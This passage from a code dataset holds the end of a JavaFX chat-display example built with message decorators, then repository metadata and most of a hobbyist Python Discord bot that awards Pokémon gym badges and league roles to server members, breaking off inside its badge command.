empty);\r\n cell.setFont(new Font(fontName, cell.getFont().getSize()));\r\n }\r\n}\r\n\r\nclass DateAdderDecorator extends MessageDrawerDecorator {\r\n public DateAdderDecorator(MessageDrawer messageDrawer) {\r\n super(messageDrawer);\r\n }\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n super.drawMessage(cell, msg, empty);\r\n if (!empty) {\r\n String date = DateFormat.getDateInstance(DateFormat.SHORT).format(msg.sentAt);\r\n String time = DateFormat.getTimeInstance(DateFormat.MEDIUM).format(msg.sentAt);\r\n VBox dateTime = new VBox(new Text(time), new Text(date));\r\n dateTime.setAlignment(Pos.CENTER);\r\n cell.setGraphic(dateTime);\r\n } else {\r\n cell.setGraphic(null);\r\n }\r\n }\r\n}\r\n\r\n\r\npublic class Task1 extends Application {\r\n private final VBox view = new VBox(5);\r\n private final HBox messageAdder = new HBox(5);\r\n private final TextField messageInput = new TextField(\"Enter your message\");\r\n private final Button messageSendButton = new Button(\"Send!\");\r\n private ObservableList<Message> messages = FXCollections.observableArrayList();\r\n private final ListView<Message> messagesView = new ListView<>(messages);\r\n\r\n @Override\r\n public void start(Stage primaryStage) {\r\n final MessageDrawer messageDrawer = getMessageDrawer();\r\n\r\n messageSendButton.setOnAction(ev -> {\r\n messages.add(new Message(messageInput.getText(), new Date()));\r\n });\r\n\r\n messagesView.setCellFactory(view -> {\r\n return new ListCell<Message>() {\r\n @Override\r\n protected void updateItem(Message msg, boolean empty) {\r\n super.updateItem(msg, empty);\r\n messageDrawer.drawMessage(this, msg, empty);\r\n }\r\n };\r\n });\r\n\r\n view.getChildren().add(messagesView);\r\n view.getChildren().add(messageAdder);\r\n messageAdder.getChildren().add(messageInput);\r\n messageAdder.getChildren().add(messageSendButton);\r\n\r\n messageAdder.setAlignment(Pos.CENTER);\r\n VBox.setVgrow(messagesView, Priority.ALWAYS);\r\n\r\n primaryStage.setScene(new Scene(view));\r\n primaryStage.show();\r\n }\r\n\r\n private MessageDrawer getMessageDrawer() {\r\n MessageDrawer messageDrawer = new BasicMessageDrawer();\r\n messageDrawer = new FontSizeDecorator(messageDrawer, 16);\r\n 
messageDrawer = new FontTypeDecorator(messageDrawer, \"Verdana\");\r\n messageDrawer = new ColorDecorator(messageDrawer, Color.web(\"#001b7b\"));\r\n messageDrawer = new DateAdderDecorator(messageDrawer);\r\n return messageDrawer;\r\n }\r\n}" } ]
75
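The `system_programming/lab1/task2/main.c` record above demonstrates the classic `select()`-with-timeout loop: wait up to five seconds for stdin, report on timeout, and exit on EOF. For reference, a minimal sketch of the same pattern in Python (an illustration only, assuming a POSIX system where `sys.stdin` is selectable; it is not part of the repository above):

```python
import select
import sys

# Wait up to 5 seconds for input on stdin, mirroring the C loop above.
while True:
    readable, _, _ = select.select([sys.stdin], [], [], 5.0)
    if not readable:
        print("no input for 5 sec")   # select() timed out
        continue
    line = sys.stdin.readline()
    if line == "":                    # EOF, like fgets() returning NULL
        print("Exiting...")
        break
    print("got:", line, end="")
```

As in the C version, stdin is the only descriptor in the read set, so there is no need to check which descriptor became ready.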
Mitohku/fesfjeksbvf-poke
https://github.com/Mitohku/fesfjeksbvf-poke
a6d952fccc3763906f82fb05b8f5bc96e87dfb9f
42033f76ee4c7e76c7f20e15577f827ecbd6df67
0e95d8c52b76e0157d0151fdce082a06325c3f84
refs/heads/master
2020-03-18T10:07:52.917074
2018-06-18T19:56:24
2018-06-18T19:56:24
134,597,945
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4918408691883087, "alphanum_fraction": 0.5687659978866577, "avg_line_length": 44.473358154296875, "blob_id": "a286ab22661216dd67c3f12e8387914062fbcc7e", "content_id": "079bbf988bd57d37d211cf9d1fe8f3676c52eea5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37778, "license_type": "no_license", "max_line_length": 312, "num_lines": 807, "path": "/bot.py", "repo_name": "Mitohku/fesfjeksbvf-poke", "src_encoding": "UTF-8", "text": "import discord\r\nfrom discord.ext import commands\r\nimport asyncio\r\nimport os\r\nimport sys\r\nimport time\r\nimport random\r\nimport datetime as dt\r\nimport datetime\r\nimport json, asyncio\r\nimport copy\r\nimport logging\r\nimport traceback\r\nimport aiohttp\r\nfrom collections import Counter\r\n\r\n\r\ncommand_prefix = \"p!\" #CHANGE IT TO WHAT YOU WANT\r\ndescription = \"Pokéberry🍓\" #ALSO CHANGE THIS\r\nbot = commands.Bot(command_prefix, description = description)\r\nbot.remove_command('help')\r\ntu = datetime.datetime.now()\r\n\r\ngym = [385419569558323202, 307219837648764928, 220231135949619200, 349989345714896906, 247166156467732482, 333204266309255168, 186195192301223936]\r\npewter = []\r\ncerulean = []\r\nvermilion = []\r\nceladon = []\r\nfuschia = []\r\nsaffron = []\r\ncinnabar = []\r\nviridian = []\r\nviolet = [220231135949619200]\r\nazalea = []\r\ngoldenrod = []\r\necruteak = [247166156467732482]\r\ncianwood = []\r\nolivine = [307219837648764928]\r\nmahogany = []\r\nblackthorn = []\r\nlaverre = [385419569558323202]\r\n\r\npewter2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\ncerulean2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nvermilion2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nceladon2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nfuschia2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nsaffron2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\ncinnabar2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nviridian2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nviolet2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nazalea2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\ngoldenrod2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\necruteak2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\ncianwood2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nolivine2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nmahogany2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nblackthorn2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nlaverre2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\n\r\nelite = [220231135949619200, 247166156467732482, 333204266309255168, 349989345714896906] \r\nelitelead = [385419569558323202] \r\n\r\nstarted = [385419569558323202, 332892224738295808]\r\nmaster = [385419569558323202, 332892224738295808]\r\ncomp = [385419569558323202, 332892224738295808] \r\n\t\r\[email protected]\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(bot.user.name)\r\n print(bot.user.id) \r\n 
print('------')\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t HELP COMMAND\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['cmds', 'commands'], description = 'Sends a message with the commands list')\r\nasync def helpme(ctx):\r\n\r\n\tdeveloper = bot.get_user(385419569558323202) # commands.get_user(commands.owner_id)\r\n\r\n\tif developer.avatar_url[54:].startswith('a_'):\r\n\t\tavi = 'https://cdn.discordapp.com/avatars/' + developer.avatar_url[35:-10]\r\n\telse:\r\n\t\tavi = developer.avatar_url\r\n\r\n\tembed = discord.Embed(colour = discord.Colour(0xA522B3))\r\n\tembed.set_thumbnail(url = avi)\r\n\tembed.set_author(name = developer, icon_url = avi)\r\n\tembed.description = f\"Hi everyone! I'm **{developer.name}**, the creator of **Pokéberry🍓** <:bot:453635744960086026> \\nI started making this bot in <:Python:453634265197051934> but I'm also a web designer. \\nI wanted to make this BOT because for each arena you get a badge when you complete it.\"\r\n\tembed.add_field(name=\"Having Issues/Problems?\", value=f\"If you have any problems with **Pokéberry🍓** <:bot:453635744960086026>,\\njust contact the Bot Developer **{developer.name}**\", inline=False)\r\n\r\n\thelp1 = discord.Embed(colour = discord.Colour(0xA522B3))\r\n\thelp1.title = f\"Pokéberry🍓 Commands List\"\r\n\thelp1.description = f\"**Pokéberry🍓** <:bot:453635744960086026>'s prefix is **p!**\\nNeed more information about a command? 
`p!help [command]`\\n\\n\"\r\n\thelp1.add_field(name=\"Core Commands\", value=\"`p!helpme`\", inline=False)\r\n\thelp1.add_field(name=\"Utility Commands\", value=\"`p!ping` **|** `p!badges` **|** `p!about` **|** `p!stats` **|** `p!leagueaccess`\", inline=False)\r\n\thelp1.add_field(name=\"Fun Commands\", value=\"`p!snowball`\", inline=False)\r\n\thelp1.set_footer(text = \"Have fun using Pokéberry🍓\")\r\n\r\n\tawait ctx.send(embed = embed)\r\n\tawait ctx.send(embed = help1)\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t OWNER COMMAND\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['creator', 'dev', 'developer'], description = 'Who is my creator?')\r\nasync def owner(ctx):\r\n\r\n\tdeveloper = bot.get_user(385419569558323202) # commands.get_user(commands.owner_id)\r\n\r\n\tif developer.avatar_url[54:].startswith('a_'):\r\n\t\tavi = 'https://cdn.discordapp.com/avatars/' + developer.avatar_url[35:-10]\r\n\telse:\r\n\t\tavi = developer.avatar_url\r\n\r\n\tembed = discord.Embed(colour = discord.Colour(0xA522B3))\r\n\r\n\tembed.set_thumbnail(url = avi)\r\n\tembed.set_author(name = developer, icon_url = avi)\r\n\r\n\tembed.description = f\"Hi everyone! I'm **{developer.name}**, the creator of **Pokéberry🍓** <:bot:453635744960086026> \\nI started making this bot in <:Python:453634265197051934> but I'm also a web designer. \\nI wanted to make this BOT because for each arena you get a badge when you complete it.\"\r\n\r\n\tawait ctx.send(embed = embed)\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t PING COMMAND\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['ping', 'ms'])\r\nasync def latency(ctx):\r\n\tpingms = \"{}\".format(int(ctx.bot.latency * 1000))\r\n\tmessage = await ctx.send(\"Ping - Calculating connection.\")\r\n\tawait message.edit(content = f\"Ping - Calculating connection..\")\r\n\tawait asyncio.sleep(0.50)\r\n\tawait message.edit(content = f\"Ping - Calculating connection...\")\r\n\tawait asyncio.sleep(0.50)\r\n\tawait message.edit(content = f\"Ping - Calculating connection....\")\r\n\tawait asyncio.sleep(0.50)\r\n\tawait message.edit(content = f\"Ping - Calculating connection.\")\r\n\tawait asyncio.sleep(0.50)\r\n\tawait message.edit(content = f\"Ping - Calculating connection..\")\r\n\tawait asyncio.sleep(0.50)\r\n\tawait message.edit(content = f\"Ping - Calculating connection...\")\r\n\tawait asyncio.sleep(1.50)\r\n\tawait message.edit(content = f\"Pong! 
- My latency is **{pingms}**ms\")\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t GAME GROUP \t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected]()\r\nasync def game(self):\r\n\r\n\tif self.invoked_subcommand is None:\r\n\t\tawait self.send(f\"Please use one of the following settings: `default`, `playing`, `streaming`, `watching`, `listening` or `clear`\")\r\n\r\[email protected](name = 'playing')\r\nasync def game_playing(self, *, game = None):\r\n\r\n\tif not game:\r\n\t\tawait self.send(f\"Please enter a status message\")\r\n\telse:\r\n\t\tawait self.bot.change_presence(game=discord.Game(name = game))\r\n\t\tawait self.send(f\"**{self.bot.user.name}**'s status successfully changed to 'Playing **{game}**'\")\r\n\r\[email protected](name = 'streaming')\r\nasync def game_streaming(self, *, game = None):\r\n\r\n\tif not game:\r\n\t\tawait self.send(f\"Please enter a status message\")\r\n\telse:\r\n\t\tawait self.bot.change_presence(game=discord.Game(name = game, url = \"https://www.twitch.tv/spiritprod\", type = 1))\r\n\t\tawait self.send(f\"**{self.bot.user.name}**'s status successfully changed to 'Streaming **{game}**'\")\r\n\r\[email protected](name = 'listening')\r\nasync def game_listening(self, *, game = None):\r\n\r\n\tif not game:\r\n\t\tawait self.send(f\"Please enter a status message\")\r\n\telse:\r\n\t\tawait self.bot.change_presence(game=discord.Game(name = game, type = 2))\r\n\t\tawait self.send(f\"**{self.bot.user.name}**'s status successfully changed to 'Listening to **{game}**'\")\r\n\r\[email protected](name = 'watching')\r\nasync def game_watching(self, *, game = None):\r\n\r\n\tif not game:\r\n\t\tawait self.send(f\"Please enter a status message\")\r\n\telse:\r\n\t\tawait self.bot.change_presence(game=discord.Game(name = game, type = 3))\r\n\t\tawait self.send(f\"**{self.bot.user.name}**'s status successfully changed to 'Watching **{game}**'\")\r\n\r\[email protected](name = 'default')\r\nasync def game_default(self):\r\n\r\n\tbot_prefix = \"p!\"\r\n\tserver = self.guild\r\n\r\n\tawait self.send(f\"**{self.bot.user.name}**'s status successfully changed to 'Default'\")\r\n\r\n\tgames = [f\"Use {bot_prefix}help for help!\", f\"{sum(1 for _ in self.bot.get_all_members())} users\", f\"Give us feedback? 
Use: {bot_prefix}feedback [message]\"]\r\n\tcurrent_number = 0\r\n\twhile True:\r\n\t\tif current_number == len(games):\r\n\t\t\tcurrent_number = 0\r\n\t\tawait self.bot.change_presence(game=discord.Game(name = games[current_number], url = \"https://www.twitch.tv/spiritprod\", type = 1))\r\n\t\tawait asyncio.sleep(20)\r\n\t\tcurrent_number += 1\r\n\r\[email protected](name = 'clear')\r\nasync def game_clear(self, *, game = None):\r\n\tawait self.bot.change_presence(game=discord.Game(name = None))\r\n\tawait self.send(f\"Cleared the status of **{self.bot.user.name}**\")\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t GYM COMPLETE \t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected]()\r\nasync def complete(ctx, *, member : discord.Member=None):\r\n\r\n\tauthor = ctx.message.author.mention\r\n\tauthor2 = ctx.author\r\n\tmention = member.mention\r\n\r\n\tif not member:\r\n\t\tawait ctx.send(f\"Please **mention** the person who **reached/finished** your gym !\")\r\n\r\n\telse:\r\n\t\tif author2.id in gym:\r\n\t\t\tif author2.id in pewter:\r\n\t\t\t\tpewter2.append(member.id)\r\n\t\t\telif author2.id in cerulean:\r\n\t\t\t\tcerulean2.append(member.id)\r\n\t\t\telif author2.id in vermilion:\r\n\t\t\t\tvermilion2.append(member.id)\r\n\t\t\telif author2.id in celadon:\r\n\t\t\t\tceladon2.append(member.id)\r\n\t\t\telif author2.id in fuschia:\r\n\t\t\t\tfuschia2.append(member.id)\r\n\t\t\telif author2.id in saffron:\r\n\t\t\t\tsaffron2.append(member.id)\r\n\t\t\telif author2.id in cinnabar:\r\n\t\t\t\tcinnabar2.append(member.id)\r\n\t\t\telif author2.id in viridian:\r\n\t\t\t\tviridian2.append(member.id)\r\n\t\t\telif author2.id in violet:\r\n\t\t\t\tviolet2.append(member.id)\r\n\t\t\telif author2.id in azalea:\r\n\t\t\t\tazalea2.append(member.id)\r\n\t\t\telif author2.id in goldenrod:\r\n\t\t\t\tgoldenrod2.append(member.id)\r\n\t\t\telif author2.id in ecruteak:\r\n\t\t\t\tecruteak2.append(member.id)\r\n\t\t\telif author2.id in cianwood:\r\n\t\t\t\tcianwood2.append(member.id)\r\n\t\t\telif author2.id in olivine:\r\n\t\t\t\tolivine2.append(member.id)\r\n\t\t\telif author2.id in mahogany:\r\n\t\t\t\tmahogany2.append(member.id)\r\n\t\t\telif author2.id in blackthorn:\r\n\t\t\t\tblackthorn2.append(member.id)\r\n\t\t\telif author2.id in laverre:\r\n\t\t\t\tlaverre2.append(member.id)\r\n\t\t\telse:\r\n\t\t\t\treturn\r\n\r\n\t\t\tawait ctx.send(f\"{mention} now have your **gym badge** for reaching/finishing your gym!\")\r\n\r\n\t\telse:\r\n\t\t\tawait ctx.send(f\"You aren't a **Gym Leader**, {author} !\")\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t LEAGUE ACCESS 
\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['league', 'access', 'la', 'al'])\r\nasync def leagueaccess(ctx, *, member: discord.Member = None):\r\n\r\n\tguild = ctx.guild\r\n\tauthor = ctx.message.author.mention\r\n\tauthor2 = ctx.author\r\n\trole = discord.utils.get(guild.roles, name='League Access')\r\n\r\n\tif author2.id in laverre2:\r\n\t\tstarted.append(author2.id)\r\n\t\tawait author2.add_roles(role)\r\n\t\tawait ctx.send(f\"{author}, you have been given access to enter the League!\")\r\n\r\n###################################################################################\r\n\r\[email protected](aliases = ['master', \"mf\", \"fm\"])\r\nasync def masterfight(ctx, *, member: discord.Member = None):\r\n\r\n\tauthor = ctx.message.author.mention\r\n\tauthor2 = ctx.author\r\n\tchannel = bot.get_channel(449660215298621470)\r\n\r\n\tif author2.id in elitelead:\r\n\t\tmaster.append(member.id)\r\n\t\tawait channel.send(f\"{member.mention} has beaten all **Elite Four** members, they can now fight against the **Elite Master** !\")\r\n\r\n###################################################################################\r\n\r\[email protected](aliases = ['comp', 'leaguec', 'cleague'])\r\nasync def leaguecompleted(ctx, *, member: discord.Member = None):\r\n\r\n\tauthor = ctx.message.author.mention\r\n\tauthor2 = ctx.author\r\n\tchannel = bot.get_channel(449660215298621470)\r\n\r\n\tif author2.id in elitelead:\r\n\t\tcomp.append(member.id)\r\n\t\tawait channel.send(f\"{member.mention} has cleared the **League**! 
Everyone give them a warm GG!\")\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t BADGES COMMAND \t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['badge', 'profile'])\r\nasync def badges(ctx, *, member: discord.Member = None):\r\n\r\n\te = discord.Embed(colour = discord.Colour(0xA522B3))\r\n\t\r\n\tif member is None:\r\n\t\tmember = ctx.author\r\n\r\n\tif member.avatar_url[54:].startswith('a_'):\r\n\t\tavi = 'https://cdn.discordapp.com/avatars/' + member.avatar_url[35:-10]\r\n\telse:\r\n\t\tavi = member.avatar_url\r\n\r\n\tif avi:\r\n\t\te.set_thumbnail(url = avi)\r\n\t\te.set_author(name = str(member), icon_url = avi)\r\n\telse:\r\n\t\te.set_thumbnail(url = member.default_avatar_url)\r\n\t\te.set_author(name = str(member), icon_url = member.default_avatar_url)\r\n\r\n\tfeatures = \"ㅤㅤ\"\r\n\tfeatures1 = \"ㅤㅤ\"\r\n\tfeatures2 = \"ㅤㅤ\"\r\n\tfeatures3 = \"ㅤㅤ\"\r\n\tfeatures4 = \"ㅤㅤ\"\r\n\tfeatures5 = \"ㅤㅤ\"\r\n\tfeatures6 = \"ㅤㅤ\"\r\n\tfeatures7 = \"ㅤㅤ\"\r\n\tfeatures8 = \"ㅤㅤ\"\r\n\tfeatures9 = \"ㅤㅤ\"\r\n\tfeatures10 = \"ㅤㅤ\"\r\n\tfeatures11 = \"ㅤㅤ\"\r\n\tfeatures12 = \"ㅤㅤ\"\r\n\tfeatures13 = \"ㅤㅤ\"\r\n\tfeatures14 = \"ㅤㅤ\"\r\n\tfeatures15 = \"ㅤㅤ\"\r\n\tfeatures16 = \"ㅤㅤ\"\r\n\tfeatures17 = \"ㅤㅤ\"\r\n\r\n\tif member.id in gym:\r\n\t\tif member.id in elite:\r\n\t\t\tfeatures17 = \"Elite Four\"\r\n\t\telif member.id in elitelead:\r\n\t\t\tfeatures17 = \"Elite Master\"\r\n\t\telse:\r\n\t\t\tif member.id in pewter:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Pewter - Rock)\"\r\n\t\t\telif member.id in cerulean:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Cerulean - Water)\"\r\n\t\t\telif member.id in vermilion:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Vermilion - Electrik)\"\r\n\t\t\telif member.id in celadon:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Celadon - Grass)\"\r\n\t\t\telif member.id in fuschia:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Fuchsia - Poison)\"\r\n\t\t\telif member.id in saffron:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Saffron - Psychic)\"\r\n\t\t\telif member.id in cinnabar:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Cinnabar - Fire)\"\r\n\t\t\telif member.id in viridian:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Viridian - Ground)\"\r\n\t\t\telif member.id in violet:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Violet - Flying)\"\r\n\t\t\telif member.id in azalea:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Azalea - Bug)\"\r\n\t\t\telif member.id in goldenrod:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Goldenrod - Normal)\"\r\n\t\t\telif member.id in ecruteak:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Ecruteak - Ghost)\"\r\n\t\t\telif member.id in cianwood:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Cianwood - Fighting)\"\r\n\t\t\telif member.id in olivine:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Olivine - Steel)\"\r\n\t\t\telif member.id in mahogany:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Mahogany - Ice)\"\r\n\t\t\telif member.id in blackthorn:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Blackthorn - Dragon)\"\r\n\t\t\telif member.id in laverre:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Laverre - 
Fairy)\"\r\n\t\t\telse:\r\n\t\t\t\tfeatures17 = \"Gym Leader\"\r\n\telse:\r\n\t\tfeatures17 = \"No Specific Role\"\r\n\r\n\tif member.id in pewter2:\r\n\t\tfeatures = \"<:Pewter:449610408060518410>\"\r\n\t\tif member.id in cerulean2:\r\n\t\t\tfeatures1 = \"<:Cerulean:449610403178217491>\"\r\n\t\t\tif member.id in vermilion2:\r\n\t\t\t\tfeatures2 = \"<:Vermilion:449610409692102666>\"\r\n\t\t\t\tif member.id in celadon2:\r\n\t\t\t\t\tfeatures3 = \"<:Celadon:449610403266297859>\"\r\n\t\t\t\t\tif member.id in fuschia2:\r\n\t\t\t\t\t\tfeatures4 = \"<:Fuchsia:449610407347355659>\"\r\n\t\t\t\t\t\tif member.id in fuschia2:\r\n\t\t\t\t\t\t\tfeatures4 = \"<:Fuchsia:449610407347355659>\"\r\n\t\t\t\t\t\t\tif member.id in saffron2:\r\n\t\t\t\t\t\t\t\tfeatures5 = \"<:Saffron:449610409637576714>\"\r\n\t\t\t\t\t\t\t\tif member.id in cinnabar2:\r\n\t\t\t\t\t\t\t\t\tfeatures6 = \"<:Cinnabar:449610408177958914>\"\r\n\t\t\t\t\t\t\t\t\tif member.id in viridian2:\r\n\t\t\t\t\t\t\t\t\t\tfeatures7 = \"<:Viridian:449610409549365248> \"\r\n\t\t\t\t\t\t\t\t\t\tif member.id in violet2:\r\n\t\t\t\t\t\t\t\t\t\t\tfeatures8 = \"<:Violet:449610409755017216>\"\r\n\t\t\t\t\t\t\t\t\t\t\tif member.id in azalea2:\r\n\t\t\t\t\t\t\t\t\t\t\t\tfeatures9 = \"<:Azalea:449610403782066177>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\tif member.id in goldenrod2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures10 = \"<:Goldenrod:449610409364684800>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in ecruteak2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures11 = \"<:Ecruteak:449610409138454542>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in cianwood2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures12 = \"<:Cianwood:449610404566401035>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in olivine2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures13 = \"<:Olivine:449610409528393728>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in mahogany2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures14 = \"<:Mahogany:449610411260772362>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in blackthorn2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures15 = \"<:Blackthorn:449610403987849216>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in laverre2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures16 = \"<:Laverre:449610407422722069>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures1 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures2 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures3 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures4 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures5 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures6 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures7 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures8 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures9 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures10 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures11 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures12 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures13 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures14 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures15 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures16 = \"ㅤㅤ\"\r\n\tb1 = \"ㅤ\"\r\n\tb2 = \"ㅤ\"\r\n\tleague1 = \"<:Didnt_Start:449628615999488000>\"\r\n\tleague2 = \"Didn't start the League\"\r\n\r\n\tif member.id in laverre2:\r\n\t\tb1 = \"No Badges Left! 
